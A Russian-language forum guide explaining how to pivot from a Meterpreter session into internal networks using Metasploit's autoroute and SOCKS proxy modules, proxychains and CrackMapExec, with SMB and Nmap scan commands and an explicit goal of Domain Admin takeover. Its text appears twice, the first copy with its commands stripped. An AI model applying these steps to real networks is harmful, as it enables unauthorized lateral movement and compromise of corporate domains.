devqp
Специалист
Введение
Данное руководство описывает настройку CrackMapExec с proxychains и Meterpreter для перечисления, проникновения и атаки внутренних сетей через pivoting.
Необходимые компоненты
[0] Meterpreter shell (установка Metasploit: https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/ или CyberArsenal Pro: https://cyberarsenal.org)
[1] Proxychains-ng:
(https://github.com/rofl0r/proxychains-ng), добавьте бинарник в $PATH
[2] CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
Установка CrackMapExec
[0] Установите Poetry (https://python-poetry.org/docs/#installing-with-the-official-installer) и добавьте в $PATH
[1] Установите зависимости:
[2] Установите Rust:
[3] Выполните:
[4] Клонируйте репозиторий:
[5] Перейдите в директорию:
[6] Установите:
[7] Активируйте окружение:
[8] Проверка:
Настройка Meterpreter
[0] Получите сессию Meterpreter и переведите в фон (
)
[1] Используйте модуль:
[2] Просмотрите опции:
[3] Укажите сессию:
(пример: x=3)
[4] Укажите подсеть:
(пример: 192.168.133.0, определите через
)
[5] Опционально:
[6] Запустите:
[7] Активируйте SOCKS-прокси:
[8] Установите параметры:
,
[9] Разрешите порт:
[10] Запустите:
Конфигурация Proxychains
[0] Отредактируйте файл:
[1] Добавьте в конец:
[2] Закомментируйте другие прокси в конце файла
[3] Сохраните изменения
Использование инструментов
Примеры команд:
[0] Сканирование SMB:
[1] Сканирование Nmap:
[2] Поддерживаются: Responder, Impacket, ldapsearch, smbmap
Результат
Данная конфигурация позволяет проникать вглубь сети. После компрометации сервера в другом домене можно продолжить продвижение для получения прав Domain Admin, что приводит к полному контролю над корпоративной сетью.
Данное руководство описывает настройку CrackMapExec с proxychains и Meterpreter для перечисления, проникновения и атаки внутренних сетей через pivoting.
Необходимые компоненты
[0] Meterpreter shell (установка Metasploit: https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/ или CyberArsenal Pro: https://cyberarsenal.org)
[1] Proxychains-ng:
Код:
sudo apt install proxychains
[2] CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
Установка CrackMapExec
[0] Установите Poetry (https://python-poetry.org/docs/#installing-with-the-official-installer) и добавьте в $PATH
[1] Установите зависимости:
Код:
sudo apt-get update; sudo apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
Код:
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Код:
reset
Код:
git clone https://github.com/byt3bl33d3r/CrackMapExec
Код:
cd CrackMapExec
Код:
poetry install
Код:
poetry shell
Код:
crackmapexec --help
Настройка Meterpreter
[0] Получите сессию Meterpreter и переведите в фон (
Код:
bg
[1] Используйте модуль:
Код:
use post/multi/manage/autoroute
Код:
show options
Код:
set SESSION x
[4] Укажите подсеть:
Код:
set SUBNET x
Код:
arp -a
[5] Опционально:
Код:
set NETMASK /24
Код:
run
Код:
use auxiliary/server/socks_proxy
Код:
set SRVHOST 127.0.0.1
Код:
set SRVPORT 1080
Код:
ufw allow 1080
Код:
run
Конфигурация Proxychains
[0] Отредактируйте файл:
Код:
vim /etc/proxychains.conf
Код:
socks5 127.0.0.1 1080
[3] Сохраните изменения
Использование инструментов
Примеры команд:
[0] Сканирование SMB:
Код:
proxychains crackmapexec smb 192.168.133.0/24
Код:
proxychains nmap -n -sT -sV -O -PN -p- 192.168.133.7
Результат
Данная конфигурация позволяет проникать вглубь сети. После компрометации сервера в другом домене можно продолжить продвижение для получения прав Domain Admin, что приводит к полному контролю над корпоративной сетью.